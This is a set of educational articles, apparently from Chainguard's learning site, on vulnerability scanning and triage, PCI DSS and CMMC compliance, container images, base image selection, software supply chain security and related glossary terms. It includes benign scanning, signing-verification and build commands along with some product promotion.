(most notably the National Vulnerability Database) and scans your software to determine if any reported vulnerabilities may be present. Having an SBOM generated for your software can streamline this process, as the SBOM itself can be scanned to determine if you’re running any packages affected by vulnerabilities. A couple of examples of open source vulnerability scanners that you can use are as follows: Trivy is a jack-of-all-trades project that can scan a variety of targets including containers, filesystems, and remote Git repositories. Grype integrates with Syft, an SBOM generation tool, making it easier to generate and then scan an SBOM for your software. Step 3 — Triage After identifying what vulnerabilities may be present in your software, you can begin triaging them. Vulnerability triage is the process of sorting and prioritizing which vulnerabilities need to be addressed first. There are a few factors to be considered when triaging, including false positive vulnerabilities, vulnerability severity, and exploitability status. False positives - Though vulnerability scanners may find and report a CVE for a given dependency, it may not be present in your software.
If the vulnerability is outside of your program’s scope (for example, in a function that you are not calling) then the vulnerability may not truly impact your application, and you do not need to spend time addressing it. Vulnerability severity – CVEs are assigned a Common Vulnerability Scoring System (CVSS) score to assess the severity of their impacts if exploited. A CVE with a CVSS score of critical may have serious consequences to the confidentiality, integrity, and availability of a system, making it a priority to remediate. In comparison, a CVE with a low severity score may be difficult to exploit or has minimal impact, so it can be remediated after higher priorities are addressed. Exploitability status – Not all vulnerabilities have been observed to be exploited. Checking to see if a vulnerability is in the Known Exploited Vulnerabilities (KEV) Catalog can tell you if there is an active attacker threat “in the wild” for vulnerabilities present in your software. Note that a vulnerability’s absence from the KEV Catalog does not mean it won’t be exploitable, as unreported or unobserved attacks on a vulnerability may still exist (or may occur in the future). Vulnerability Exploitability eXchange (VEX) documents can be helpful references when triaging vulnerabilities. VEX is a model which allows software developers to report the status of vulnerabilities in a software product to inform downstream users of what actions they should take to address them. If a scanner reports a vulnerability in a product, a VEX document can elaborate on how the vulnerability truly impacts it. To learn more about how you can use VEX, check out OpenVEX, an open source implementation of VEX that you can leverage when generating or ingesting VEX documents. Step 4 — Remediation Once you have triaged the vulnerabilities found in your software, you can move on to remediating them. Vulnerability remediation is the act of correcting and removing CVEs from your software. Using a CVE ID, you can check sources such as the National Vulnerability Database (NVD) for advisories regarding a vulnerability. Here, you can learn what steps should be taken to address the vulnerability. Oftentimes, this will include updating dependencies to patched versions. After you have followed guidance to fix the vulnerability, you should scan your software again to ensure that it was properly remediated. Note that not all true positive vulnerabilities may be remediable. In some cases, a patch is not yet made available to address the vulnerability, or updating the package version may introduce breaking changes to your program. In situations like these, focus on what you can remediate given your resources at the time. Vulnerabilities in Container Images Container images are like little bundles of code containing the files and dependencies they each need to run. They are called containers because they operate as a discrete unit; each container has what it needs, and can run independently from other containers. Container images are helpful as they prevent inputs, permissions, and dependencies from clashing with one another. However, containers are prone to accumulating vulnerabilities if they are not properly maintained. As vulnerabilities are discovered and reported, containers should be rebuilt to use updated, secured versions, or else they will begin to collect vulnerabilities. 
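One way to see what a given container image has accumulated is to apply steps 1 and 2 above directly to the image. Below is a minimal sketch, assuming syft, grype, and trivy are installed and using a placeholder image name:

```shell
# Step 1: generate an SBOM for the image
syft registry.example.com/my-app:1.2.3 -o spdx-json > sbom.spdx.json

# Step 2: scan the SBOM for known vulnerabilities
grype sbom:sbom.spdx.json

# The image can also be scanned directly, for example with Trivy
trivy image registry.example.com/my-app:1.2.3
```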
Research from Chainguard Labs has shown that container images from Docker Hub, a popular container image registry, will accumulate one vulnerability per day if not updated. To combat the accumulation of vulnerabilities in containers, you should choose lightweight, minimal container images which are frequently rebuilt. Popular container images often come bundled with hundreds of packages, some of which may be unnecessary for your applications. These extra components contribute to vulnerability accumulation as they don’t necessarily add functionality, but they do add more vectors to attack. Using a distribution such as Alpine Linux or the Wolfi undistro, both of which prioritize security and size, can reduce dead weight in your containers. In addition, frequently rebuilding your images ensures that packages are up-to-date and include security patches. Chainguard Containers offer minimal, frequently rebuilt images to help you reduce vulnerabilities present in your containers. They are built on top of Wolfi with the goal of minimizing total attack surface and updating continuously in order to reduce your CVE count. The following graph illustrates the drastic reduction in CVEs seen by switching from an official base image to its Chainguard Containers variant. (Graph: Python, comparing the latest official Python image with cgr.dev/chainguard/python.) Check out our article on selecting a base image to explore more factors that should impact your container image choice. Next Steps After identifying, triaging, and remediating vulnerabilities, you will be left with both a better understanding of your software and a more secure product. However, vulnerability remediation does not stop there. As your software is developed further, new vulnerabilities may be introduced or discovered. It is important to continue scanning your software frequently in order to address any new security concerns that may arise. Learn More Vulnerability management can be daunting at first, especially when your scanners report high CVE counts across hundreds of project dependencies. By leveraging the tools and procedures fit for your needs, you can work towards securing your software, one vulnerability at a time. In this article, you learned four steps that you can take towards reducing vulnerabilities in your software. You learned how you can use resources such as SBOMs, VEX, and the KEV Catalog to aid you in vulnerability triage. In addition, you explored factors that impact triage and remediation, and how you can choose container images with fewer vulnerabilities. To learn more about software vulnerabilities, you can read our other articles about CVEs. For more information on getting started with Chainguard Containers, check out our website and documentation. --- ### Simplify Your Path to PCI DSS 4.0 Compliance with Chainguard URL: https://edu.chainguard.dev/software-security/compliance/pci-dss-4/pci-dss-chainguard/ Last Modified: August 21, 2024 Tags: compliance, PCI DSS 4.0, standards Compliance with PCI DSS 4.0, or Payment Card Industry Data Security Standard, requires adherence to strong security standards. Rigorous requirements must be met in order to secure your networks, systems, storage, and access according to the guidelines. Chainguard doesn’t build images specifically for PCI DSS, but our images can help you meet the requirements in many ways, easing your burden in the process of achieving compliance. Securing your software supply chain provides a solid foundation for minimizing vulnerabilities.
All Chainguard Containers save time and costs required to triage, patch, and remediate CVEs. They are created and officially maintained by Chainguard engineers. Our images are designed to be minimal, removing unnecessary software that is not specifically used. This eliminates a number of potential attack vectors. On top of this, you must authenticate into Chainguard to use Chainguard Containers, giving you reassurance of the provenance of your images. They include digitally signed build-time SBOMs (software bill of materials) documenting and attesting to the full provenance. Our FIPS (Federal Information Processing Standard) compliant images, combined with STIG-hardened (Security Technical Implementation Guide) configurations, provide an even stronger foundation for meeting the requirements of PCI DSS because they are hardened further to meet the more stringent FedRAMP requirements. What are STIG-Hardened FIPS Images? STIG-hardened FIPS images are pre-configured container images that have been secured according to the Security Technical Implementation Guide (STIG) standards set by the Defense Information Systems Agency (DISA). These images meet stringent federal security requirements, combining FIPS-compliant encryption with robust security configurations that protect against vulnerabilities and threats. By using STIG-hardened FIPS images, organizations ensure that their systems adhere to federal encryption standards and best practices for cybersecurity, making them particularly valuable in environments that require high levels of security. How do Chainguard Containers Help? One of the main requirements of PCI DSS is to maintain a vulnerability management program. PCI DSS requires you to scan for vulnerabilities once every three months (Requirement 11.3.1) and triage and address all vulnerabilities (Requirement 11.3.11). Chainguard protects you from malicious attacks by supplying you with images where CVEs have already been dealt with, removing vulnerabilities for you. PCI DSS requires that you catalog and classify vulnerabilities in bespoke and third-party software (Requirements 6.3.1 and 6.3.2). You must fix all critical and high vulnerabilities and have a plan of action for the rest (Requirement 11.4.4). Chainguard does that for you. Vulnerability scanners can be noisy and sifting through false positives while cataloging true vulnerabilities can be tedious work. Providing justifications for vulnerabilities that aren’t applicable takes time, and that is after investigating them thoroughly. Chainguard Containers are carefully engineered to contain low-to-no CVEs. Organizations can use them as their source to build their applications on. The benefits of our solution are: You’re secured by default: Our images contain low-to-no CVEs. Check out our Images Directory yourself. Extensive scanner partnerships: We partner with industry-leading scanners such as Snyk, CrowdStrike, and Wiz. SBOM for all Chainguard Containers: Get full transparency into the packages actually used in our images and ultimately run in your environment (see the verification sketch after this list). Less ongoing human overhead: Every new Chainguard Container version is carefully scanned and any addressable CVEs are fixed. Trust in our industry-leading [CVE SLA](https://www.chainguard.dev/cve-sla): We are committed to supplying secure software and commit to fixing CVEs so you don’t have to.
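As referenced above, these provenance claims can be checked independently. The sketch below assumes cosign and jq are installed; the certificate identity and issuer values shown are illustrative, so consult the documentation for the image you are verifying for the exact values to use.

```shell
# Verify the signature on a Chainguard Container image.
# The identity and issuer flags below are illustrative values; use the ones
# published for the specific image you are verifying.
cosign verify \
  --certificate-oidc-issuer=https://token.actions.githubusercontent.com \
  --certificate-identity=https://github.com/chainguard-images/images/.github/workflows/release.yaml@refs/heads/main \
  cgr.dev/chainguard/python | jq
```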
Browse all PCI DSS 4.0 Articles Introduction to PCI DSS 4.0 Overview of PCI DSS 4.0 Practices/Requirements How Chainguard Can Help With PCI DSS 4.0 (Current article) Get started with FIPS Chainguard Containers today! --- ### Simplify Your Path to CMMC 2.0 Compliance with Chainguard URL: https://edu.chainguard.dev/software-security/compliance/cmmc-2/cmmc-chainguard/ Last Modified: August 15, 2024 Tags: compliance, CMMC 2.0, standards Achieving Cybersecurity Maturity Model Certification (CMMC) 2.0 Level 2 or Level 3 certification can be a complex and resource-intensive process, particularly for organizations managing containerized environments and addressing vulnerabilities. Chainguard simplifies this journey by offering specialized solutions that drastically reduce the time and effort needed to meet compliance requirements. Our FIPS (Federal Information Processing Standard) compliant images, combined with detailed SBOM (Software Bill of Materials) and STIG-hardened (Security Technical Implementation Guide) configurations, provide a strong foundation for meeting the requirements of CMMC 2.0. What are STIG-Hardened FIPS Images? STIG-hardened FIPS images are pre-configured container images that have been secured according to the Security Technical Implementation Guide (STIG) standards set by the Defense Information Systems Agency (DISA). These images meet stringent federal security requirements, combining FIPS-compliant encryption with robust security configurations that protect against vulnerabilities and threats. By using STIG-hardened FIPS images, organizations ensure that their systems adhere to federal encryption standards and best practices for cybersecurity, making them particularly valuable in environments that require high levels of security, such as those governed by CMMC 2.0. Why STIG-Hardened FIPS Images for CMMC 2.0? STIG-hardened FIPS images are highly beneficial for achieving CMMC 2.0 compliance due to their enhanced security features and adherence to strict guidelines. Here’s how they can support your CMMC 2.0 efforts: Enhanced Security Posture STIG hardening applies a set of security configurations and practices designed to protect systems from vulnerabilities and threats. By utilizing STIG-hardened FIPS images, organizations ensure that their systems meet rigorous security standards, reducing the risk of exploitation. This is particularly important for CMMC 2.0 Level 2 and Level 3 requirements, which emphasize advanced security practices and robust protection of Controlled Unclassified Information (CUI) and Federal Contract Information (FCI). Streamlined Compliance FIPS-compliant images meet federal encryption standards, which are a key component of CMMC 2.0 requirements. STIG hardening adds an additional layer of security by ensuring that the system configurations are in line with best practices for securing systems. These hardened images come with pre-configured settings that address many of the CMMC controls, such as those related to access control, vulnerability management, and incident response, thereby simplifying the compliance process and reducing the time and effort needed to achieve certification. Simplified Reporting and Documentation STIG-hardened FIPS images typically include detailed scan reports and documentation that can be used to demonstrate compliance with CMMC 2.0 controls. These reports help organizations quickly identify and address security gaps, and the detailed documentation supports the creation of necessary reports for auditors and assessors.
This streamlining of the reporting process aids in maintaining and proving compliance with CMMC requirements, such as those related to vulnerability management (e.g., CM.2.062 and CM.3.068) and continuous monitoring (e.g., SC.3.177). By leveraging Chainguard’s resources, organizations can accelerate their path to CMMC 2.0 certification while effectively managing and reporting on critical security controls. Our integrated approach not only ensures that compliance requirements are met but also enhances overall security posture, allowing organizations to focus on their core operations with confidence. Browse all CMMC 2.0 Articles Introduction to CMMC 2.0 CMMC 2.0 Maturity Levels Overview of CMMC 2.0 Practice/Control Groups How Chainguard Can Help With CMMC 2.0 (Current article) Get started with FIPS Chainguard Containers today! --- ### What are Containers? URL: https://edu.chainguard.dev/software-security/what-are-containers/ Last Modified: October 31, 2023 Tags: Conceptual, Overview Maximizing the performance of computer hardware has been a critical undertaking for software engineers for decades. First developed in the 1960s, virtual machines (VMs) were an early answer to this challenge, allowing a single computer to host multiple, isolated operating systems. VMs enable different guest users or processes to share physical infrastructure while keeping their concurrent operations separated. However, as VMs are both slow to initialize and resource-intensive, a modern solution arrived in the early 2000s: containers. Containers share a common kernel with each other, whereas multiple VMs each require their own virtual kernel. The kernel resides at the core of an operating system and facilitates activities between hardware and software. By sharing a kernel, containers run concurrently using the same infrastructure, providing the isolation benefits of VMs without added resource taxation. Containers have become increasingly popular for their relative ease of use, reproducibility, and portability in deploying applications across systems for a low resource cost. This article explores the structure of container images, the foundational unit behind containers, including their key contents and the processes used to construct them. You will learn how containers operate on top of their container engine and associated infrastructure. You will also learn how to get started with using containers, including building, choosing, and deploying container images for your applications. Structure of a Container Image In order to build a container for your application, you will need to start with a container image. A container image is a static, immutable filesystem bundle that serves as a blueprint you can use to build containers. Inside every container image is a curated collection of the files, dependencies, and code needed to run an application. At runtime, when a container is built from an image, the resultant container inherits all characteristics of the container image it is instantiated from. To start creating a container image, you must first select a base image. A base image is a foundational image that can be built upon through the addition of image layers. Typically, base images come pre-bundled with a specific Linux distribution. Every distribution differs in its size, dependencies, and functionality, making certain distributions better suited to certain images than others.
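A quick, low-stakes way to feel this difference is to pull two candidate base images and compare what you get. The tags below are examples, and the reported sizes will change over time.

```shell
# Pull two Python base images and compare their sizes
docker pull python:latest
docker pull cgr.dev/chainguard/python:latest

docker images python:latest
docker images cgr.dev/chainguard/python:latest
```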
After selecting a base image, there are a few different ways you can introduce tailored functionality (such as your application-specific code or dependencies) to the image. Many developers today use Docker, a tool used to deploy containerized applications, which ingests a Dockerfile, a machine-readable configuration document containing the instructions to assemble an image with multiple layers. Aside from Dockerfiles, you can use tools such as apko and ko to build images, though they produce images using a single-layer construction method. For example, say you want to build a container to run your Python application. You can start your container image with a Python base image, such as a Wolfi-based image. Then, you can add your application and its relevant dependencies to the image through the layers in a Dockerfile. The resultant image is now ready to be deployed with your application bundled inside. Instantiating Containers Once you have selected or assembled a container image for your application, you will use it to instantiate a running container. Deploying live containers from an image requires a container engine, which is the software that allows for the hosting of multiple containers on one shared machine. Docker Engine is a prominent example of a container engine. A container engine communicates with the kernel of the operating system of the host it is being run on. Within a container engine, multiple containers run independently of each other. These containers are composed of the code, dependencies, and configurations of their parent images. The following graphic depicts this hierarchical relationship between containers and the container engine. Getting Started with Containers Depending on your application, you may not need to build your own container images from scratch. Instead, you can pull a container image from a container registry. Container registries are centralized repositories with images available to be pulled. A popular container registry, Docker Hub, hosts hundreds of thousands of open source container images that can be pulled and used. Other container registries include the GitHub Container Registry and the Google Artifact Registry. Additionally, the Chainguard registry offers a free public catalog of secure, minimal base images that provide a strong foundation for containerizing your applications. There are many factors to consider when choosing a container image for your application. At minimum, your container image will need to have the core packages and components required to support your programs. However, with thousands of options to choose from, some images will be better for your use case than others. Choosing a container image that offers security and reliability in addition to core functionality is important. Some images may contain multitudes of unneeded components and packages, thus unnecessarily contributing to your data egress and vulnerability counts. To learn more about choosing a container image that is right for your applications, check out our article on selecting a base image. Learn More This article covered the fundamentals of container technology, including the processes behind building container images tailored to your specific needs. You learned how you can deploy containers from images for your applications using a container engine. Additionally, you explored various container registries that you can pull images from for your next project. 
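To tie these pieces together, here is a minimal sketch of the Python example described earlier: a Wolfi-based Python base image, application dependencies and code added as layers, and a container instantiated from the result. The image tag, file names, and entrypoint are illustrative; adjust them to match your application and the base image you choose.

```shell
# Write a minimal Dockerfile for the Python example described above
cat > Dockerfile <<'EOF'
# Start from a Python base image (here, a Wolfi-based development variant)
FROM cgr.dev/chainguard/python:latest-dev

WORKDIR /app

# Add application dependencies as one layer...
COPY requirements.txt .
RUN pip install --no-cache-dir -r requirements.txt

# ...and the application code as another
COPY main.py .

# Run the application when a container is instantiated from the image
ENTRYPOINT ["python", "main.py"]
EOF

# Build the image and instantiate a container from it
docker build -t my-python-app .
docker run --rm my-python-app
```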
To get started with using containers for the first time, check out our documentation on Chainguard Containers, our hardened, minimal images ideal for deploying secure containerized applications. If you want to build your own images, check out Wolfi, the Linux undistro ideal as a base of lightweight containers. Lastly, you may also be interested in learning about the Open Container Initiative, which sets standards for image formats, runtimes, and distributions. We encourage you to check out our article titled “What is the Open Container Initiative?”. --- ### CISA Secure Software Development Attestation Form (Draft) URL: https://edu.chainguard.dev/software-security/secure-software-development/ssd-attestation-form/ Last Modified: May 10, 2023 Tags: Reference Attestation and Signature On behalf of the above-specified company, I attest that [software producer] presently makes consistent use of the following practices, drawn from the secure software development framework (SSDF), in developing the software identified in Section I: The software is developed and built in secure environments. Those environments are secured by the following actions, at a minimum: Separating and protecting each environment involved in developing and building Software; Regularly logging, monitoring, and auditing trust relationships used for authorization and access: to any software development and build environments; and among components within each environment; Enforcing multi-factor authentication and conditional access across the environments relevant to developing and building software in a manner that minimized security risk; Taking consistent and reasonable steps to document as well as minimize use or inclusion of software products that create undue risk within the environments used to develop and build software; Encrypting sensitive data, such as credentials, to the extent practicable and based on risk; Implementing defensive cyber security practices, including continuous monitoring of operations and alerts and, as necessary, responding to suspected and confirmed cyber incidents; The software producer has made a good-faith effort to maintain trusted source code supply chains by: Employing automated tools or comparable processes; and Establishing a process that includes reasonable steps to address the security of third-party components and manage related vulnerabilities; The software producer employs automated tools or comparable processes in a good-faith effort to maintain trusted source code supply chains; The software producer maintains provenance data for internal and third-party code incorporated into the software; The software producer employs automated tools or comparable processes that check for security vulnerabilities. In addition: The software producer ensures these processes operate on an ongoing basis and, at a minimum, prior to product, version, or update releases; and The software producer has a policy or process to address discovered security vulnerabilities prior to product release; and The software producer operates a vulnerability disclosure program and accepts, reviews, and addresses disclosed software vulnerabilities in a timely fashion. I attest that all requirements outlined above are consistently maintained and satisfied. I further attest the company will notify all impacted agencies if conformance to any element of this attestation is no longer valid. 
Please check the appropriate boxes below, if applicable: There are addendums and/or artifacts attached to this self-attestation form, the title and contents of which are delineated below the signature line. I attest that the referenced software has been verified by a certified FedRAMP Third Party Assessor Organization (3PAO) or other 3PAO approved by an appropriate agency official, and the Assessor used relevant NIST Guidance, which includes all elements outlined in this form, as the assessment baseline. Relevant documentation is attached. References The Draft of the Secure Software Development Self Attestation Form available on cisa.gov, was released as part of a Request For Comments on April 27, 2023. Comments are due on June 26, 2023. Reprinted courtesy of the National Institute of Standards and Technology, U.S. Department of Commerce. Not copyrightable in the United States. --- ### Selecting a Base Container Image URL: https://edu.chainguard.dev/software-security/selecting-a-base-image/ Last Modified: August 4, 2022 Tags: Conceptual Software teams building and deploying container-based software applications often use a “base image,” an initial set of software packages often associated with a Linux distribution. Software developers, security professionals, and infrastructure teams seeking to make an informed decision about what base image to use must consider a number of criteria when selecting a base image appropriate for their needs. To help these parties make a more informed decision when selecting a base image, this article describes a range of criteria: Ensuring the image contains needed core functionality The number of known vulnerabilities The frequency at which the image is rebuilt The number of packages The update frequency and security hygiene of the underlying distribution The amount of maintainer support associated with the base image The size of the image in MB Whether the image is signed Whether the image has an SBOM After reading this section, software professionals will have a mental checklist that makes them better prepared to select a base image for container-based software applications. Ensure the base image contains needed core functionality First and foremost, the base image needs to contain the necessary minimum functionality. For instance, for a team that is developing a Python application, this would include the Python runtime, the software that translates source code into machine code. Without the appropriate core functionality, the base image will be unable to serve the needs of the software developer and his or her application. More technical users might also be interested in aspects such as whether there is glibc or musl support. Choose an image with few or no known vulnerabilities Another key factor is the number of known vulnerabilities associated with the packages inside the image. Popular open source scanners such as trivy and grype allow a user to scan container images to identify vulnerabilities. Known vulnerabilities, consistently ranked a critical security threat for web applications, allow attackers to exploit a piece of software without the work of discovering a previously unknown vulnerability. Recent empirical software security research indicates that many popular images have hundreds of known vulnerabilities. Software teams should select base images with as few known vulnerabilities as possible. This not only has security benefits but also reduces the toil of manually triaging vulnerabilities, i.e. 
determining whether the vulnerability is a true positive or false positive and whether the vulnerability is exploitable in the context of the deployed application. While some specialists point out that many reported vulnerabilities have never been known to be exploited in the wild, this observation should not be mistaken as an invitation to disregard vulnerability counts. Because many, perhaps most, compromises are never reported, any list of vulnerabilities known to have been exploited should be treated as imperfect knowledge. Other vulnerabilities might have been exploited in the wild and no defender knows yet. In short, maintaining a low known vulnerability count reduces security risk and staff toil, thereby enabling faster development. Choose an image that is frequently rebuilt Of course, choosing an image that has a low vulnerability count today does not guarantee a low vulnerability count tomorrow. New vulnerabilities can arise, new non-security bugs are patched, and new features emerge for the many packages inside a base image. To enable a software team to take advantage of new fixes, security or otherwise, developers ought to prefer images that are rebuilt frequently. Rebuilding entails using the latest versions of all the constituent packages, which reduces the vulnerability count and enables downstream consumers of the base image to upgrade the version if desired. Some research suggests that over half of the container images found on Docker Hub, a repository for container images, haven’t been updated for four months or longer. Likewise, official Docker images can have similarly slow update cadences. When selecting a base image, a software team should examine the frequency of updating. Choose an image with a minimal number of packages Choosing base images with a minimal number of packages is also a sensible principle. This reduces the “attack surface” and also reduces complexity. Fewer packages, all things equal, mean fewer vulnerabilities (both known and unknown). Additionally, for teams that must use a pinned image and thus can’t take advantage of frequent rebuilds, fewer packages also mean a slower vulnerability accumulation rate. Additionally, choosing “distroless” images, which strip out package managers, package manager dependencies, and other build-time dependencies, is another way to ensure that your team is choosing a secure-by-default base image. Choose an image based on a software distribution that prioritizes package update frequency and security hygiene The packages inside a container are often sourced from a Linux distribution such as Debian, Ubuntu, or Wolfi. The update frequency, and hence the security, of an image therefore also depends on the software development practices associated with that distribution. Software teams should therefore assess the distribution underlying the packages in their images. All things equal, software teams should prefer a distribution that prioritizes frequent updates so that vulnerabilities are quickly fixed. Choose an image with maintainers that actively support it Not all container images are actively maintained. Like open source software packages in general, container images require one or more persons to ensure timely and frequent rebuilds, manage broader security concerns, and respond to bugs and issues. Unmaintained or lightly maintained images can pose a problem to software teams that want to prioritize development velocity and security.
Without the ability to rapidly work with upstream image maintainers, software teams must either accept the risk of using old versions of the image that potentially have unpatched bugs, or consider creating and maintaining a fork with the overhead associated with that course of action. Choose an image that is smaller Smaller images (fewer MB) mean lower storage costs and lower transmission costs. When an image is pulled thousands of times a day, even a small difference in size can quickly add to the cost. Choose an image that is signed Software signing ensures that attackers who tamper with a software artifact, such as a container image, can be detected. Software teams should choose to use container images that have been signed, with tools such as Cosign, and verify the signatures to ensure that the images on which they depend are tamper-free. Choose an image with an SBOM A software bill of materials (SBOM), a list of ingredients for a piece of software, provides visibility into the components of a piece of software, enabling transparency and informed decision-making. Choosing base images with SBOMs generated by the party responsible for building the artifact helps the image consumer make better-informed decisions related to the security and health of the code. Self-assessment [True or False] The frequency at which a container image is rebuilt does not affect the number of known software vulnerabilities associated with the container image. False: Infrequently rebuilt images accumulate vulnerabilities as new vulnerabilities are discovered for the packages inside an image. [True or False] Choosing base images with few or no known vulnerabilities reduces security risk and reduces staff toil. True: Fewer known vulnerabilities, all things equal, make the attacker's job harder and reduce the vulnerability triage burden on security teams and developers. For readers interested in an example of images that prioritize the criteria described above, Chainguard Containers offers one option. --- ### What is software supply chain security URL: https://edu.chainguard.dev/software-security/what-is-software-supply-chain-security/ Last Modified: August 4, 2022 Tags: Conceptual An earlier version of this material was published in the first chapter of the Linux Foundation Sigstore course. Software producers have a supply chain just like manufacturing businesses have a supply chain. And just like manufacturers require physical inputs and then perform a manufacturing process to build a finished product, so do software producers, whether the producer is a company or individual. In other words, a software producer uses components, developed by third parties and themselves, and technologies to write, build, and distribute software. A compromise introduced anywhere in this chain is an example of a software supply chain security issue. Some observers might think that all software security issues are software supply chain issues. How else would vulnerabilities end up in the finished software if not through the software supply chain? A generic example can help illustrate the difference. Imagine ACME company unintentionally creates a SQL injection vulnerability in a piece of software that ACME company distributes. This is not a software supply chain security issue. Code from ACME’s own developers is responsible for this security issue.
But should ACME company use an open source software component that has been maliciously tampered with to send sensitive secrets to an attacker when the code was built, then ACME would be the victim of a software supply chain attack. In that case, the supply chain of ACME's developers is the origin of the security issue. Software supply chain compromises can involve both malicious and unintentional vulnerabilities. The insertion of malicious code anywhere along the supply chain poses a severe risk to downstream users, but unintentional vulnerabilities in the software supply chain can also lead to risks should some party choose to exploit these vulnerabilities. For instance, the Log4j open source software vulnerability in late 2021 exemplifies the danger of vulnerabilities in the supply chain, including the open source software supply chain. In this case, Log4j, a popular open source Java logging library, had a severe and relatively easily exploitable security bug. Many of the companies and individuals using software built with Log4j found themselves vulnerable because of this bug. Malicious attacks, which often amount to code tampering, nonetheless deserve special recognition. In these attacks, an attacker controls the functionality inserted into the software supply chain and can often target attacks on specific victims. These attacks often prey on the lack of integrity in the software supply chain, taking advantage of the trust that software developers place in the components and tools they use to build software. Notable attack vectors include compromises of source code systems, such as GitHub or GitLab; build systems, like Jenkins; and publishing infrastructure, whether corporate software publishing servers, update servers, or community package infrastructure. Another important attack vector is when an attacker steals the credentials of an individual open source software developer and adds malicious code to a source code management system or published package. Fortunately, a number of promising counters to software supply chain attacks have emerged. For instance, projects like Sigstore offer a chance to restore integrity to the software supply chain and initiatives like the Open Source Security Foundation provide a forum for concerted action. Further information on software supply chain security compromises and counters can be found in this reading list. One further term merits a definition and explanation. Cloud-native software supply chain security refers to software supply chain security efforts that are related to container technology. The process of selecting, building, and operating containers has a number of important implications for software supply chain security. For instance, signing containers with a digital signature (via a tool like Cosign) is one way to ensure that an attacker that tampers with a container is detected. Container technology both epitomizes the potential software supply chain security perils that modern organizations must confront and enables approaches that can make a software supply chain secure by default. --- ### Chainguard Glossary URL: https://edu.chainguard.dev/software-security/glossary/ Last Modified: August 10, 2023 Tags: Conceptual General terms Software supply chain As with supply chains for material goods, a software supply chain is composed of the activities that an organization undertakes to deliver an end product or service to a consumer.
Software supply chain activities involve the transformation of dependencies, packages, components, binaries, build and packaging scripts, code and other software artifacts, and infrastructure into a finished software deliverable that is deployed into production. Participants in the supply chain include actors like developers, reviewers, testers, and maintainers who are working on the product at hand, but also include those who maintain and contribute to packages, package managers, and other software that may be incorporated into a given product. Software supply chains also include information relevant to the software, such as versioning, signatures, and hashes. Software supply chain attacks An intentional act of inserting malicious functionality into — or taking advantage of a known vulnerability within — the build, source, components, or deployment software or infrastructure, with the goal of propagating that harmful functionality through current distribution methods. Software development life cycle The methodology and process for planning, designing, creating, testing, deploying, and maintaining software. Software artifact An artifact is an immutable blob of data. Examples of artifacts include a file, a Git commit, a container image, and a firmware image. Software vulnerability A software vulnerability is a weakness in a program which, if left unaddressed, may be used by attackers to access, manipulate, or compromise a computer system. A vulnerability can impact various parts of a system depending on where or how it is introduced, and can be targeted through different vectors based on the type of weakness it introduces. Developers refer to vulnerabilities by their corresponding CVE ID when patching or remediating any known security flaws. Attestation An attestation allows consumers of a software artifact to verify the quality of that artifact independently from the producer of the software. It also requires software producers to provide verifiable proof of the quality of their software. You can think of an attestation as a proclamation that software artifact X was produced by Y person at Z time. CI/CD A pipeline approach to code development and release. CI stands for continuous integration, referring to the automation of testing code modifications frequently to avoid conflicts between developer changes. CD stands for continuous delivery and/or deployment, referring to the next stage of the pipeline, where code is automatically merged to a repository or production environment after passing tests in order to fast-track the release of new changes to customers. CI/CD aims to reduce the slowdowns caused by manual code checking and approval, shortening the development cycle and allowing more updates to reach consumers. CISA The Cybersecurity and Infrastructure Security Agency (CISA) is a U.S. federal government agency under the Department of Homeland Security. Since its inception in 2018, CISA has championed the adoption of secure software development practices, such as the use of SBOMs and VEX documentation. CISA operates the Known Exploited Vulnerabilities (KEV) Catalog, a helpful tool for software developers who are working on vulnerability remediation. Additionally, it sponsors the National Vulnerability Database (NVD). CVE Standing for Common Vulnerabilities and Exposures, CVEs are records assigned to publicly disclosed software vulnerabilities, stored in a searchable catalog. Each CVE consists of a unique CVE ID, a description of the vulnerability, and any relevant references or advisories.
The CVE Program is operated by The MITRE Corporation and supported by a variety of U.S. government agencies. KEV Catalog The Known Exploited Vulnerabilities (KEV) Catalog is populated with CVEs that have existing exploits "in the wild". Operated by the Cybersecurity and Infrastructure Security Agency (CISA), the KEV Catalog serves as a tool for developers as it identifies CVEs that need to be prioritized for remediation because of their exploitability status. NVD The National Vulnerability Database (NVD) is operated by the National Institute of Standards and Technology (NIST), an agency of the U.S. Department of Commerce. The NVD analyzes CVE records and their related public advisories to provide additional information on how a vulnerability impacts a software product. The NVD is often used by vulnerability scanners as a primary reference. Provenance Provenance is the verifiable information about software artifacts describing where, when, and how something was produced. Zero-day The origin and exact meaning of this term vary among sources, but a zero-day is a recently discovered vulnerability. One explanation for the term is that a zero-day vulnerability is a very new vulnerability for which there isn't a fix, and developers have had "zero days" to find a solution. Others define it as an unknown vulnerability or exploit already affecting your system. "Zero-day" refers to the age of the vulnerability, counted from when you or your security organization first becomes aware of it; because the vulnerability is "zero days" old, few if any defenders are aware of it and there isn't yet a known fix for it. The derivative terms zero-day attack or zero-day exploit refer to an attack taking advantage of such a previously unknown vulnerability. Security tools and frameworks Certificate authority Often abbreviated as CA, a certificate or certification authority is a governing body that stores, signs, and issues digital certificates that can verify claims about the ownership of a given public key. Software consumers can use a CA to verify the assertions made about the private key that corresponds with the certified public key. As trusted third parties, CAs use the X.509 or EMV standard to format certificates. Code signing The process of digitally signing software artifacts to verify the author of the software as well as guarantee that the code has not been altered in any way since it was signed. Cryptographic hashes are used to sign software in order to validate authenticity and integrity. Code signing results in a signature. OCI OCI stands for the Open Container Initiative, which is an open governance structure that was set up to create and foster open industry standards around software container formats and runtimes. OIDC OIDC is short for OpenID Connect, an identity layer that is built on top of the OAuth 2.0 protocol and is governed by the OpenID Foundation. The protocol allows for identity authentication and verification based on the authentication performed by a provider such as Apple, Google, GitLab, or Microsoft. PKI Standing for public key infrastructure, PKI arranges the necessary elements of infrastructure to manage public-key encryption, binding public keys to the respective identities of entities (including individuals and organizations). Red teaming Conducting a red team assessment consists of goal-based adversarial activity to demonstrate how attackers can combine exploits to compromise the integrity of software or other technology.
